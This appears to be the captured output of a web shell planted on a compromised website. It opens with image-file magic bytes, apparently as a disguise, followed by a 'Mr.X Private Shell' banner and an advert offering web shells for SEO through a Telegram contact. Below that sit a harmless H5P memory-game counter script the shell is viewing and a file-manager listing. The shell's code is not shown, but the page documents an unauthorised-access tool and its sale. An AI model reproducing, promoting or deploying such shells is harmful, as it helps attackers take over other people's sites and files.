����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
(function (MemoryGame) {
/**
* Keeps track of the number of cards that has been turned
*
* @class H5P.MemoryGame.Counter
* @param {H5P.jQuery} $container
*/
MemoryGame.Counter = function ($container, startValue = 0) {
/** @alias H5P.MemoryGame.Counter# */
var self = this;
var current = startValue;
/**
* @private
*/
self.update = function () {
$container[0].innerText = current;
};
/**
* Get current count.
* @returns {number} Current count.
*/
self.getCount = () => {
return current;
}
/**
* Increment the counter.
*/
self.increment = function () {
current++;
self.update();
};
/**
* Revert counter back to its natural state
*/
self.reset = function () {
current = 0;
self.update();
};
self.update();
};
})(H5P.MemoryGame);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 1ff85a50ce80dbd0d50e20b94595cfbd881c538c | File | 900 B | 0666 |
|